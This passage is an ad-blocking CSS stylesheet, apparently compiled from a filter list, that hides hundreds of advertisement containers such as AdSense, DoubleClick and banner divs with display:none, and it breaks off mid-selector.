span[id^="preLoadWrap"].preLoadWrap,.prWrap,[id^="ad_block"],[id^="adbrite"],[id^="dclkAds"],[id^="ew"][id$="_bannerDiv"],[id^="konaLayer"],[src*="sixsigmatraffic.com"],a[href^="http://ad."][href*=".doubleclick.net/"],a[href^="http://adserver.adpredictive.com"],div[class^="dms_ad_IDS"],div[id^="adKontekst_"],div[id^="google_ads_div"],div[id^="kona_"][id$="_wrapper"],div[id^="sponsorads"],div[id^="y5_direct"],embed[flashvars*="AdID"],iframe[id^="dapIfM"],iframe[id^="etarget"][id$="banner"],iframe[name^="AdBrite"],iframe[name^="google_ads_"],img[src^="http://cdn.adnxs.com"],script[src="//pagead2.googleadservices.com/pagead/show_ads.js"] + ins > ins > iframe,script[src="http://pagead2.googlesyndication.com/pagead/show_ads.js"] + ins > ins > iframe,table[cellpadding="0"][width="100%"] > * > * > * > div[id^="tpa"],#A9AdsMiddleBoxTop,#A9AdsOutOfStockWidgetTop,#A9AdsServicesWidgetTop,#ADNETwallBanner1,#ADNETwallBanner2,#ADSLOT_1,#ADSLOT_2,#ADSLOT_3,#ADSLOT_4,#ADSLOT_SKYSCRAPER,#ADVERTISE_HERE_ROW,#AD_CONTROL_22,#AD_CONTROL_28,#AD_CONTROL_29,#AD_CONTROL_8,#AD_ROW,#AD_Top,#AD_newsblock,#ADgoogle_newsblock,#ADsmallWrapper,#Ad160x600,#Ad300x250,#Ad3Left,#Ad3Right,#Ad3TextAd,#AdArea,#AdBanner_F1,#AdBar,#AdBar1,#AdBox2,#AdContainer,#AdContainerTop,#AdContentModule_F,#AdDetails_GoogleLinksBottom,#AdDetails_InsureWith,#AdFrame4,#AdHeader,#AdLeaderboardBottom,#AdLeaderboardTop,#AdMiddle,#AdMobileLink,#AdPopUp,#AdRectangle,#AdSenseDiv,#AdSenseResults1_adSenseSponsorDiv,#AdServer,#AdShowcase_F1,#AdSky23,#AdSkyscraper,#AdSpacing,#AdSponsor_SF,#AdSubsectionShowcase_F1,#AdTargetControl1_iframe,#AdTop,#AdTopLeader,#Ad_BelowContent,#Ad_Block,#Ad_Center1,#Ad_Right1,#Ad_RightBottom,#Ad_RightTop,#Ad_Top,#Adbanner,#Adrectangle,#AdsContent,#AdsRight,#AdsWrap,#Ads_BA_CAD,#Ads_BA_CAD2,#Ads_BA_CAD_box,#Ads_BA_SKY,#Ads_CAD,#Ads_OV_BS,#Ads_Special,#AdvertMPU23b,#AdvertPanel,#AdvertiseFrame,#Advertisement,#Advertisements,#Advertorial,#Advertorials,#AdvertsBottom,#AdvertsBottomR,#BANNER_160x600,#BANNER_300x250,#BANNER_728x90,#BannerAd,#BannerAdvert,#BigBoxAd,#BodyAd,#BotAd,#Bottom468x60AD,#ButtonAd,#ClickPop_LayerPop_Container,#CompanyDetailsNarrowGoogleAdsPresentationControl,#CompanyDetailsWideGoogleAdsPresentationControl,#ContentAd,#ContentAd1,#ContentAd2,#ContentAdPlaceHolder1,#ContentAdPlaceHolder2,#ContentAdXXL,#ContentPolepositionAds_Result,#CornerAd,#DartAd300x250,#DivAdEggHeadCafeTopBanner,#FIN_videoplayer_300x250ad,#FooterAd,#FooterAdContainer,#GOOGLE_ADS_47,#GoogleAd1,#GoogleAd2,#GoogleAd3,#GoogleAdsPlaceHolder,#GoogleAdsPresentationControl,#GoogleAdsense,#Google_Adsense_Main,#HEADERAD,#HOME_TOP_RIGHT_BOXAD,#HeaderAD,#HeaderAdsBlock,#HeaderAdsBlockFront,#HeaderBannerAdSpacer,#HeaderTextAd,#HeroAd,#HomeAd1,#HouseAd,#ID_Ad_Sky,#JobsearchResultsAds,#Journal_Ad_125,#Journal_Ad_300,#JuxtapozAds,#KH-contentAd,#LargeRectangleAd,#LeftAd,#LeftAd1,#LeftAdF1,#LeftAdF2,#LftAd,#LoungeAdsDiv,#LowerContentAd,#MPUAdSpace,#MainSponsoredLinks,#Meebo\:AdElement\.Root,#Nightly_adContainer,#NormalAdModule,#OpenXAds,#OverrideAdArea,#PREFOOTER_LEFT_BOXAD,#PREFOOTER_RIGHT_BOXAD,#PageLeaderAd,#PreRollAd,#RelevantAds,#RgtAd1,#RightAd,#RightBottom300x250AD,#RightNavTopAdSpot,#RightSponsoredAd,#SectionAd300-250,#SectionSponsorAd,#SideAdMpu,#SidebarAdContainer,#SkyAd,#SpecialAds,#SponsoredAd,#SponsoredLinks,#TL_footer_advertisement,#TOP_ADROW,#TOP_RIGHT_BOXAD,#Tadspacefoot,#Tadspacehead,#Tadspacemrec,#TextLinkAds,#ThreadAd,#Top468x60AD,#TopAd,#TopAdBox,#TopAdContainer,#TopAdDiv,#TopAdPos,#TopBannerAd,#VM-MPU-adspace,#VM-footer-adspace,#VM-header-adspace,#VM-header-adwrap,#XEadLeaderboard,#XEadSkyscraper,#YahooAdParentContainer,#_ads,#abHeaderAdStreamer,#about_adsbottom,#abovepostads,#ad-1000x90-1,#ad-120x600-sidebar,#ad-120x60Div,#ad-160x600,#ad-160x600-sidebar,#ad-250,#ad-250x300,#ad-300,#ad-300x250,#ad-300x250-1,#ad-300x250-sidebar,#ad-300x250Div,#ad-300x60-1,#ad-376x280,#ad-728,#ad-728x90,#ad-728x90-1,#ad-728x90-leaderboard-top,#ad-728x90-top0,#ad-ads,#ad-article,#ad-banner,#ad-banner-1,#ad-bigbox,#ad-billboard-bottom,#ad-block-125,#ad-bottom,#ad-bottom-wrapper,#ad-box,#ad-box-first,#ad-box-second,#ad-boxes,#ad-bs,#ad-buttons,#ad-colB-1,#ad-column,#ad-container,#ad-content,#ad-contentad,#ad-first-post,#ad-flex-first,#ad-footer,#ad-footprint-160x600,#ad-frame,#ad-front-footer,#ad-front-sponsoredlinks,#ad-fullbanner2,#ad-globalleaderboard,#ad-halfpage,#ad-header,#ad-header-728x90,#ad-horizontal-header,#ad-img,#ad-inner,#ad-label,#ad-leaderboard,#ad-leaderboard-1-container,#ad-leaderboard-bottom,#ad-leaderboard-container,#ad-leaderboard-spot,#ad-leaderboard-top,#ad-left,#ad-left-sidebar-ad-1,#ad-left-sidebar-ad-2,#ad-left-sidebar-ad-3,#ad-links-content,#ad-list-row,#ad-lrec,#ad-medium,#ad-medium-rectangle,#ad-medrec,#ad-middlethree,#ad-middletwo,#ad-module,#ad-mpu,#ad-mpu1-spot,#ad-mpu2,#ad-mpu2-spot,#ad-north,#ad-one,#ad-placard,#ad-placeholder,#ad-rectangle,#ad-right,#ad-right-sidebar-ad-1,#ad-right-sidebar-ad-2,#ad-righttop,#ad-row,#ad-side,#ad-side-text,#ad-sidebar,#ad-sky,#ad-skyscraper,#ad-slot-right,#ad-slug-wrapper,#ad-small-banner,#ad-space,#ad-special,#ad-splash,#ad-sponsors,#ad-spot,#ad-squares,#ad-story-bottom-out,#ad-story-right,#ad-target,#ad-target-Leaderbord,#ad-teaser,#ad-text,#ad-top,#ad-top-banner,#ad-top-text-low,#ad-top-wrap,#ad-tower,#ad-trailerboard-spot,#ad-two,#ad-typ1,#ad-unit,#ad-wrap,#ad-wrap-right,#ad-wrapper,#ad-wrapper1,#ad-yahoo-simple,#ad-zone-1,#ad-zone-2,#ad-zone-inline,#ad01,#ad02,#ad1006,#ad11,#ad125BL,#ad125BR,#ad125TL,#ad125TR,#ad125x125,#ad160x600,#ad160x600right,#ad1Sp,#ad2Sp,#ad300,#ad300-250,#ad300X250,#ad300_x_250,#ad300x100Middle,#ad300x150,#ad300x250,#ad300x250Module,#ad300x60,#ad300x600,#ad300x600_callout,#ad336,#ad336x280,#ad375x85,#ad468,#ad468x60,#ad468x60_top,#ad526x250,#ad600,#ad728,#ad728Mid,#ad728Top,#ad728Wrapper,#ad728top,#ad728x90,#ad728x90_1,#ad90,#adBadges,#adBanner,#adBanner10,#adBanner120x600,#adBanner160x600,#adBanner2,#adBanner3,#adBanner336x280,#adBanner4,#adBanner728,#adBanner9,#adBannerTable,#adBannerTop,#adBar,#adBelt,#adBlock125,#adBlockTop,#adBlocks,#adBottbanner,#adBox,#adBox11,#adBox16,#adBox350,#adBox390,#adCirc300X200,#adCirc_620_100,#adCol,#adColumn,#adCompanionSubstitute,#adComponentWrapper,#adContainer,#adContainer_1,#adContainer_2,#adContainer_3,#adDiv,#adDiv300,#adDiv728,#adFiller,#adFps,#adFtofrs,#adGallery,#adGoogleText,#adGroup1,#adHeader,#adHeaderTop,#adIsland,#adLB,#adLabel,#adLayer,#adLeader,#adLeaderTop,#adLeaderboard,#adMPU,#adMediumRectangle,#adMiddle0Frontpage,#adMiniPremiere,#adMonster1,#adOuter,#adPlaceHolderRight,#adPlacer,#adPosOne,#adRight,#adRight2,#adSPLITCOLUMNTOPRIGHT,#adSenseModule,#adSenseWrapper,#adServer_marginal,#adShortTower,#adSidebar,#adSidebarSq,#adSky,#adSkyscraper,#adSlider,#adSpace,#adSpace0,#adSpace1,#adSpace10,#adSpace11,#adSpace12,#adSpace13,#adSpace14,#adSpace15,#adSpace16,#adSpace17,#adSpace18,#adSpace19,#adSpace2,#adSpace20,#adSpace21,#adSpace22,#adSpace23,#adSpace24,#adSpace25,#adSpace3,#adSpace300_ifrMain,#adSpace4,#adSpace5,#adSpace6,#adSpace7,#adSpace8,#adSpace9,#adSpace_footer,#adSpace_right,#adSpace_top,#adSpacer,#adSpecial,#adSplotlightEm,#adSpot-Leader,#adSpot-banner,#adSpot-island,#adSpot-mrec1,#adSpot-sponsoredlinks,#adSpot-textbox1,#adSpot-widestrip,#adSpotAdvertorial,#adSpotIsland,#adSpotSponsoredLinks,#adSquare,#adStaticA,#adStrip,#adSuperAd,#adSuperPremiere,#adSuperSkyscraper,#adSuperbanner,#adTableCell,#adTag1,#adTag2,#adText,#adTextCustom,#adTextLink,#adText_container,#adTile,#adTop,#adTopContent,#adTopbanner,#adTopboxright,#adTower,#adUnit,#adWrapper,#adZoneTop,#ad_1,#ad_130x250_inhouse,#ad_160x160,#ad_160x600,#ad_190x90,#ad_2,#ad_3,#ad_300,#ad_300_250,#ad_300_250_1,#ad_300a,#ad_300b,#ad_300c,#ad_300x100_m_c,#ad_300x250,#ad_300x250_content_column,#ad_300x250_m_c,#ad_300x250m,#ad_300x90,#ad_4,#ad_468_60,#ad_468x60,#ad_5,#ad_728_foot,#ad_728x90,#ad_728x90_container,#ad_940,#ad_984,#ad_A,#ad_B,#ad_Banner,#ad_C,#ad_C2,#ad_D,#ad_E,#ad_F,#ad_G,#ad_H,#ad_I,#ad_J,#ad_K,#ad_L,#ad_M,#ad_N,#ad_O,#ad_P,#ad_YieldManager-300x250,#ad_YieldManager-728x90,#ad_adsense,#ad_after_navbar,#ad_anchor,#ad_area,#ad_banner,#ad_bannerManage_1,#ad_banner_top,#ad_banners,#ad_bar,#ad_bellow_post,#ad_bigsize_wrapper,#ad_block_1,#ad_block_2,#ad_bottom,#ad_box,#ad_box_colspan,#ad_box_top,#ad_branding,#ad_bs_area,#ad_buttons,#ad_center_monster,#ad_circ300x250,#ad_cna2,#ad_cont,#ad_container,#ad_container_0,#ad_container_marginal,#ad_container_side,#ad_container_sidebar,#ad_container_top,#ad_content_top,#ad_content_wrap,#ad_feature,#ad_firstpost,#ad_footer,#ad_frame,#ad_front_three,#ad_fullbanner,#ad_gallery,#ad_global_header,#ad_h3,#ad_haha_1,#ad_haha_4,#ad_halfpage,#ad_head,#ad_header,#ad_holder,#ad_horizontal,#ad_horseshoe_left,#ad_horseshoe_right,#ad_horseshoe_spacer,#ad_horseshoe_top,#ad_hotpots,#ad_in_arti,#ad_island,#ad_label,#ad_large_rectangular,#ad_lastpost,#ad_layer,#ad_layer2,#ad_leader,#ad_leaderBoard,#ad_leaderboard,#ad_leaderboard728x90,#ad_leaderboard_top,#ad_left,#ad_lnk,#ad_lrec,#ad_lwr_square,#ad_main,#ad_medium_rectangle,#ad_medium_rectangular,#ad_mediumrectangle,#ad_menu_header,#ad_message,#ad_middle,#ad_most_pop_234x60_req_wrapper,#ad_mpu,#ad_mpu300x250,#ad_mpuav,#ad_mrcontent,#ad_newsletter,#ad_overlay,#ad_place,#ad_play_300,#ad_rect,#ad_rect_body,#ad_rect_bottom,#ad_rectangle,#ad_rectangle_medium,#ad_related_links_div,#ad_related_links_div_program,#ad_replace_div_0,#ad_replace_div_1,#ad_report_leaderboard,#ad_report_rectangle,#ad_results,#ad_right,#ad_right_main,#ad_ros_tower,#ad_rr_1,#ad_script_head,#ad_sec,#ad_sec_div,#ad_sgd,#ad_sidebar,#ad_sidebar1,#ad_sidebar2,#ad_sidebar3,#ad_sky,#ad_skyscraper,#ad_skyscraper160x600,#ad_skyscraper_text,#ad_slot_leaderboard,#ad_slot_livesky,#ad_slot_sky_top,#ad_space,#ad_square,#ad_ss,#ad_table,#ad_term_bottom_place,#ad_text:not(textarea),#ad_thread_first_post_content,#ad_top,#ad_top_holder,#ad_tp_banner_1,#ad_tp_banner_2,#ad_txt,#ad_unit,#ad_vertical,#ad_wide,#ad_wide_box,#ad_widget,#ad_window,#ad_wrap,#ad_wrapper,#adaptvcompanion,#adbForum,#adbanner,#adbar,#adbig,#adbnr,#adboard,#adbody,#adbottom,#adbox,#adbox1,#adbox2,#adbutton,#adclear,#adcode,#adcode1,#adcode2,#adcode3,#adcode4,#adcolumnwrapper,#adcontainer,#adcontainer1,#adcontainerRight,#adcontainsm,#adcontent,#adcontent1,#adcontrolPushSite,#add_ciao2,#addbottomleft,#addiv-bottom,#addiv-top,#adfooter,#adfooter_728x90,#adframe:not(frameset),#adhead,#adhead_g,#adheader,#adhome,#adiframe1_iframe,#adiframe2_iframe,#adiframe3_iframe,#adimg,#adition_content_ad,#adlabel,#adlabelFooter,#adlayer,#adlayerContainer,#adlayer_back,#adlayerad,#adleaderboard,#adleaderboard_flex,#adleaderboardb,#adleaderboardb_flex,#adleft,#adlinks,#adlinkws,#adlrec,#admanager_leaderboard,#admid,#admiddle3center,#admiddle3left,#adposition,#adposition-C,#adposition-FPMM,#adposition1,#adposition2,#adposition3,#adposition4,#adrectangle,#adrectanglea,#adrectanglea_flex,#adrectangleb,#adrectangleb_flex,#adrig,#adright,#adright2,#adrighthome,#ads-250,#ads-468,#ads-area,#ads-block,#ads-bot,#ads-bottom,#ads-col,#ads-dell,#ads-footer,#ads-footer-inner,#ads-horizontal,#ads-indextext,#ads-leaderboard1,#ads-lrec,#ads-main,#ads-menu,#ads-middle,#ads-prices,#ads-rhs,#ads-right,#ads-sponsored-boxes,#ads-top,#ads-vers7,#ads-wrapper,#ads120,#ads125,#ads160left,#ads300,#ads300-250,#ads300Bottom,#ads300Top,#ads315,#ads336x280,#ads728,#ads728bottom,#ads728top,#ads790,#adsBox-460_left,#adsBox-dynamic-right,#adsBoxResultsPage,#adsContent,#adsDisplay,#adsDiv1,#adsDiv2,#adsDiv3,#adsDiv4,#adsDiv5,#adsDiv6,#adsDiv7,#adsHeader,#adsID,#ads_160,#ads_300,#ads_728,#ads_banner,#ads_belowforumlist,#ads_belownav,#ads_bottom,#ads_bottom_inner,#ads_bottom_outer,#ads_box,#ads_button,#ads_catDiv,#ads_container,#ads_footer,#ads_fullsize,#ads_halfsize,#ads_header,#ads_html1,#ads_html2,#ads_inner,#ads_lb,#ads_medrect,#ads_notice,#ads_right,#ads_right_sidebar,#ads_sidebar_roadblock,#ads_space,#ads_text,#ads_top,#ads_topbanner,#ads_watch_top_square,#ads_zone27,#adsbottom,#adsbox,#adsbox-left,#adsbox-right,#adscolumn,#adsd_contentad_r1,#adsd_contentad_r2,#adsd_contentad_r3,#adsd_topbanner,#adsd_txt_sky,#adsdiv,#adsection,#adsense,#adsense-2,#adsense-header,#adsense-new,#adsense-tag,#adsense-text,#adsense03,#adsense04,#adsense05,#adsense1,#adsenseLeft,#adsenseOne,#adsenseWrap,#adsense_article_left,#adsense_block,#adsense_box,#adsense_box_video,#adsense_inline,#adsense_leaderboard,#adsense_overlay,#adsense_placeholder_2,#adsenseheader,#adsensetopplay,#adsensewidget-3,#adserv,#adshometop,#adsimage,#adskinlink,#adsky,#adskyscraper,#adslider,#adslot,#adsmiddle,#adsonar,#adspace,#adspace-1,#adspace-300x250,#adspace-leaderboard-top,#adspace300x250,#adspaceBox,#adspaceBox300,#adspace_header,#adspace_leaderboard,#adspacer,#adsponsorImg,#adspot,#adspot-1,#adspot-149x170,#adspot-1x4,#adspot-2,#adspot-295x60,#adspot-2a,#adspot-2b,#adspot-300x110-pos-1,#adspot-300x125,#adspot-300x250-pos-1,#adspot-300x250-pos-2,#adspot-468x60-pos-2,#adspot-a,#adspot300x250,#adspot_220x90,#adspot_300x250,#adspot_468x60,#adspot_728x90,#adsquare,#adsright,#adstop,#adtab,#adtag_right_side,#adtagfooter,#adtagheader,#adtagrightcol,#adtaily-widget-light,#adtech_0,#adtech_1,#adtech_2,#adtech_3,#adtech_googleslot_03c,#adtech_takeover,#adtext,#adtop,#adtophp,#adtxt,#adv-300,#adv-leaderboard,#adv-left,#adv-masthead,#adv-middle,#adv-mpux,#adv-x36,#adv-x37,#adv-x38,#adv-x39,#adv-x40,#adv1,#adv300bottom { display:none !important; } #adv300top,#adv728,#adv_300,#adv_728,#adv_border,#adv_google_300,#adv_google_728,#adv_halfpage,#adv_halfpage_title,#adv_leaderboard,#adv_sky,#adv_top_banner_wrapper,#adver1,#adver2,#adver3,#adver4,#adver5,#adver6,#adver7,#advert-1,#advert-120,#advert-boomer,#advert-display,#advert-header,#advert-leaderboard,#advert-links-bottom,#advert-skyscraper,#advert-top,#advert1,#advertBanner,#advertContainer,#advertDB,#advertRight,#advertSection,#advert_125x125,#advert_250x250,#advert_box,#advert_home01,#advert_leaderboard,#advert_lrec_format,#advert_mid,#advert_mpu,#advert_mpu_1,#advert_right_skyscraper,#advert_sky,#advertbox,#advertbox2,#advertbox3,#advertbox4,#adverthome,#advertise,#advertise-here,#advertise-here-sidebar,#advertise-now,#advertise1,#advertiseHere,#advertisement1,#advertisement160x600,#advertisement3,#advertisement728x90,#advertisementHorizontal,#advertisementLigatus,#advertisementPrio2,#advertisementRight,#advertisementRightcolumn0,#advertisementRightcolumn1,#advertisementsarticle,#advertiser-container,#advertiserLinks,#advertisers,#advertising,#advertising-banner,#advertising-caption,#advertising-container,#advertising-control,#advertising-skyscraper,#advertising-top,#advertising2,#advertisingModule160x600,#advertisingModule728x90,#advertisingTopWrapper,#advertising_btm,#advertising_contentad,#advertising_horiz_cont,#advertisment,#advertismentElementInUniversalbox,#advertorial,#advertorial_red_listblock,#adverts,#adverts-top-container,#adverts-top-left,#adverts-top-middle,#adverts-top-right,#advertsingle,#advertspace,#advheader,#advsingle,#advt,#advtext,#advtop,#adwhitepaperwidget,#adwin_rec,#adwith,#adwords-4-container,#adwrapper,#adxBigAd,#adxMiddle5,#adxSponLink,#adxSponLinkA,#adxtop,#adxtop2,#adzbanner,#adzerk,#adzerk1,#adzerk2,#adzone,#adzoneBANNER,#adzoneheader,#afc-container,#affinityBannerAd,#after-content-ads,#after-header-ad-left,#after-header-ad-right,#after-header-ads,#agi-ad300x250,#agi-ad300x250overlay,#agi-sponsored,#alert_ads,#anchorAd,#annoying_ad,#ap_adframe,#ap_cu_overlay,#ap_cu_wrapper,#apiBackgroundAd,#apiTopAdWrap,#apmNADiv,#apolload,#araHealthSponsorAd,#area-adcenter,#area1ads,#article-ad,#article-ad-container,#article-box-ad,#articleAdReplacement,#articleLeftAdColumn,#articleSideAd,#article_ad,#article_ad_container,#article_box_ad,#articlead1,#articlead2,#asideads,#asinglead,#atlasAdDivGame,#awds-nt1-ad,#babAdTop,#banner-300x250,#banner-ad,#banner-ad-container,#banner-ads,#banner250x250,#banner300x250,#banner468x60,#banner728x90,#bannerAd,#bannerAdTop,#bannerAdWrapper,#bannerAd_ctr,#bannerAd_rdr,#banner_160x600,#banner_300_250,#banner_ad,#banner_ad_footer,#banner_ad_module,#banner_admicro,#banner_ads,#banner_advertisement,#banner_content_ad,#banner_topad,#bannerad,#bannerad2,#baseAdvertising,#basket-adContainer,#bbccom_mpu,#bbo_ad1,#bg-footer-ads,#bg-footer-ads2,#bg_YieldManager-160x600,#bg_YieldManager-300x250,#bg_YieldManager-728x90,#bigAd,#bigBoxAd,#bigad300outer,#bigadbox,#bigadframe,#bigadspot,#billboard_ad,#block-ad_cube-1,#block-openads-0,#block-openads-1,#block-openads-2,#block-openads-3,#block-openads-4,#block-openads-5,#block-spti_ga-spti_ga_adwords,#block-thewrap_ads_250x300-0,#block_advert,#block_advertisement,#blog-ad,#blog_ad_content,#blog_ad_opa,#blog_ad_right,#blog_ad_top,#blox-big-ad,#blox-big-ad-bottom,#blox-big-ad-top,#blox-halfpage-ad,#blox-tile-ad,#blox-tower-ad,#body_728_ad,#book-ad,#botad,#bott_ad2,#bott_ad2_300,#bottom-ad,#bottom-ad-container,#bottom-ad-tray,#bottom-ad-wrapper,#bottom-ads,#bottomAd,#bottomAdCCBucket,#bottomAdContainer,#bottomAdSense,#bottomAdSenseDiv,#bottomAds,#bottomAdvBox,#bottomContentAd,#bottomRightAd,#bottomRightAdSpace,#bottom_ad,#bottom_ad_area,#bottom_ad_unit,#bottom_ads,#bottom_banner_ad,#bottom_overture,#bottom_sponsor_ads,#bottom_sponsored_links,#bottom_text_ad,#bottomad,#bottomads,#bottomadsense,#bottomadwrapper,#bottomleaderboardad,#box-ad-section,#box-ads-small-1,#box-ads-small-2,#box-content-ad,#box-googleadsense-1,#box-googleadsense-r,#box1ad,#boxAd300,#boxAdContainer,#boxAdvert,#box_ad,#box_advertisment,#box_mod_googleadsense,#boxad1,#boxad2,#boxad3,#boxad4,#boxad5,#boxads,#bpAd,#bps-header-ad-container,#btnAds,#btnads,#btr_horiz_ad,#burn_header_ad,#button-ads-horizontal,#button-ads-vertical,#buttonAdWrapper1,#buttonAdWrapper2,#buttonAds,#buttonAdsContainer,#button_ad_container,#button_ad_wrap,#button_ads,#buttonad,#buy-sell-ads,#c4ad-Middle1,#c_ad_sb,#c_ad_sky,#caAdLarger,#catad,#category-ad,#cellAd,#channel_ad,#channel_ads,#ciHomeRHSAdslot,#circ_ad,#closeable-ad,#cmn_ad_box,#cmn_toolbar_ad,#cnnAboveFoldBelowAd,#cnnRR336ad,#cnnSponsoredPods,#cnnTopAd,#cnnVPAd,#col3_advertising,#colAd,#colRightAd,#collapseobj_adsection,#column4-google-ads,#comments-ad-container,#commercial_ads,#common_right_ad_wrapper,#common_right_lower_ad_wrapper,#common_right_lower_adspace,#common_right_lower_player_ad_wrapper,#common_right_lower_player_adspace,#common_right_player_ad_wrapper,#common_right_player_adspace,#common_right_right_adspace,#common_top_adspace,#comp_AdsLeaderboardTop,#companion-ad,#companionAd,#companionAdDiv,#companionad,#container-righttopads,#container-topleftads,#containerLocalAds,#containerLocalAdsInner,#containerMrecAd,#containerSqAd,#content-ad-header,#content-header-ad,#content-left-ad,#content-right-ad,#contentAd,#contentBoxad,#contentTopAds2,#content_ad,#content_ad_square,#content_ad_top,#content_ads_content,#content_box_300body_sponsoredoffers,#content_box_adright300_google,#content_lower_center_right_ad,#content_mpu,#contentad,#contentad_imtext,#contentad_right,#contentads,#contentinlineAd,#contents_post_ad,#contextad,#contextual-ads,#contextual-ads-block,#contextualad,#coverADS,#coverads,#ctl00_Adspace_Top_Height,#ctl00_BottomAd,#ctl00_ContentMain_BanManAd468_BanManAd,#ctl00_ContentPlaceHolder1_blockAdd_divAdvert,#ctl00_ContentRightColumn_RightColumn_Ad1_BanManAd,#ctl00_ContentRightColumn_RightColumn_Ad2_BanManAd,#ctl00_ContentRightColumn_RightColumn_PremiumAd1_ucBanMan_BanManAd,#ctl00_LHTowerAd,#ctl00_LeftHandAd,#ctl00_MasterHolder_IBanner_adHolder,#ctl00_TopAd,#ctl00_TowerAd,#ctl00_VBanner_adHolder,#ctl00__Content__RepeaterReplies_ctl03__AdReply,#ctl00_abot_bb,#ctl00_adFooter,#ctl00_advert_LargeMPU_div_AdPlaceHolder,#ctl00_atop_bt,#ctl00_cphMain_hlAd1,#ctl00_cphMain_hlAd2,#ctl00_cphMain_hlAd3,#ctl00_ctl00_MainPlaceHolder_itvAdSkyscraper,#ctl00_ctl00_ctl00_Main_Main_PlaceHolderGoogleTopBanner_MPTopBannerAd,#ctl00_ctl00_ctl00_Main_Main_SideBar_MPSideAd,#ctl00_dlTilesAds,#ctl00_m_skinTracker_m_adLBL,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayMiddle_pnlAffiliateAdvert,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayRight_pnlAffiliateAdvert,#ctl00_topAd,#ctrlsponsored,#cubeAd,#cube_ads,#cube_ads_inner,#cubead,#cubead-2,#currencies-sponsored-by,#custom-advert-leadboard-spacer,#dAdverts,#dItemBox_ads,#dart_160x600,#dc-display-right-ad-1,#dcadSpot-Leader,#dcadSpot-LeaderFooter,#dcol-sponsored,#defer-adright,#detail_page_vid_topads,#div-gpt-ad-1,#div-gpt-ad-2,#div-gpt-ad-3,#div-gpt-ad-4,#divAd,#divAdBox,#divAdWrapper,#divAdvertisement,#divBottomad1,#divBottomad2,#divDoubleAd,#divLeftAd12,#divLeftRecAd,#divMenuAds,#divWNAdHeader,#divWrapper_Ad,#div_ad_leaderboard,#div_video_ads,#dlads,#dni-header-ad,#dnn_adLeaderBoard2008,#dnn_ad_banner,#download_ads,#dp_ads1,#ds-mpu,#ds_ad_north_leaderboard,#editorsmpu,#em_ad_superbanner,#embedded-ad,#evotopTen_advert,#ex-ligatus,#exads,#extra-search-ads,#fb_adbox,#fb_rightadpanel,#featAds,#featuread,#featured-advertisements,#featuredAdContainer2,#featuredAds,#featured_ad_links,#feed_links_ad_container,#file_sponsored_link,#first-300-ad,#first-adlayer,#first_ad_unit,#firstad,#flAdData6,#fl_hdrAd,#flash_ads_1,#flexiad,#floatingAd,#floating_ad_container,#foot-ad-1,#footad,#footer-ad,#footer-ads,#footer-advert,#footer-adverts,#footer-sponsored,#footerAd,#footerAdDiv,#footerAds,#footerAdvertisement,#footerAdverts,#footer_ad,#footer_ad_01,#footer_ad_block,#footer_ad_container,#footer_ad_modules,#footer_ads,#footer_adspace,#footer_text_ad,#footerad,#footerads,#footeradsbox,#forum_top_ad,#four_ads,#fpad1,#fpad2,#fpv_companionad,#fr_ad_center,#frame_admain,#frnAdSky,#frnBannerAd,#frnContentAd,#front_ad728,#front_advert,#front_mpu,#ft-ad,#ft-ad-1,#ft-ad-container,#ft_mpu,#fullsizebanner_468x60,#fusionad,#fw-advertisement,#g_ad,#g_adsense,#ga_300x250,#galleries-tower-ad,#gallery-ad,#gallery-ad-m0,#gallery-random-ad,#gallery_ads,#game-info-ad,#gamead,#gameads,#gasense,#gglads,#global_header_ad_area,#gm-ad-lrec,#gmi-ResourcePageAd,#gmi-ResourcePageLowerAd,#goad1,#goads,#gooadtop,#google-ad,#google-ad-art,#google-ad-table-right,#google-ad-tower,#google-ads,#google-ads-bottom,#google-ads-header,#google-ads-left-side,#google-adsense-mpusize,#googleAd,#googleAdArea,#googleAds,#googleAdsSml,#googleAdsense,#googleAdsenseBanner,#googleAdsenseBannerBlog,#googleAdwordsModule,#googleAfcContainer,#googleSearchAds,#googleShoppingAdsRight,#googleShoppingAdsTop,#googleSubAds,#google_ad,#google_ad_container,#google_ad_inline,#google_ad_test,#google_ads,#google_ads_aCol,#google_ads_frame1,#google_ads_frame1_anchor,#google_ads_frame2,#google_ads_frame2_anchor,#google_ads_frame3,#google_ads_frame3_anchor,#google_ads_test,#google_ads_top,#google_adsense_home_468x60_1,#googlead,#googlead-sidebar-middle,#googlead-sidebar-top,#googlead2,#googleadbox,#googleads,#googleads_mpu_injection,#googleadsense,#googlesponsor,#gpt-ad-halfpage,#gpt-ad-rectangle1,#gpt-ad-rectangle2,#gpt-ad-skyscraper,#gpt-ad-story_rectangle3,#grid_ad,#gsyadrectangleload,#gsyadrightload,#gsyadtop,#gsyadtopload,#gtopadvts,#half-page-ad,#halfPageAd,#halfe-page-ad-box,#hd-ads,#hd-banner-ad,#hdtv_ad_ss,#head-ad,#head-ad-1,#head-banner468,#headAd,#head_ad,#head_advert,#headad,#header-ad,#header-ad-left,#header-ad-rectangle-container,#header-ad-right,#header-ad2010,#header-ads,#header-adspace,#header-advert,#header-advertisement,#header-advertising,#header-adverts,#header-banner-ad,#headerAd,#headerAdBackground,#headerAdContainer,#headerAdWrap,#headerAds,#headerAdsWrapper,#headerTopAd,#header_ad,#header_ad_728_90,#header_ad_container,#header_adcode,#header_ads,#header_advertisement_top,#header_flag_ad,#header_leaderboard_ad_container,#header_publicidad,#headerad,#headeradbox,#headerads,#headeradsbox,#headeradvertholder,#headeradwrap,#headline_ad,#headlinesAdBlock,#hiddenadAC,#hideads,#hl-sponsored-results,#hly_ad_side_bar_tower_left,#hly_inner_page_google_ad,#home-advert-module,#home-rectangle-ad,#home-top-ads,#homeMPU,#homeTopRightAd,#home_ad,#home_bottom_ad,#home_contentad,#home_feature_ad,#home_lower_center_right_ad,#home_mpu,#home_spensoredlinks,#homead,#homepage-ad,#homepageAdsTop,#homepageFooterAd,#homepage_right_ad,#homepage_right_ad_container,#homepage_top_ads,#hometop_234x60ad,#hor_ad,#horizad,#horizontal-banner-ad,#horizontal_ad,#horizontal_ad_top,#horizontalads,#hot-deals-ad,#houseAd,#hp-header-ad,#hp-mpu,#hp-right-ad,#hp-store-ad,#hpV2_300x250Ad,#hpV2_googAds,#hp_ad300x250,#ibt_local_ad728,#icePage_SearchLinks_AdRightDiv,#icePage_SearchLinks_DownloadToolbarAdRightDiv,#icePage_SearchResults_ads0_SponsoredLink,#icePage_SearchResults_ads1_SponsoredLink,#icePage_SearchResults_ads2_SponsoredLink,#icePage_SearchResults_ads3_SponsoredLink,#icePage_SearchResults_ads4_SponsoredLink,#idS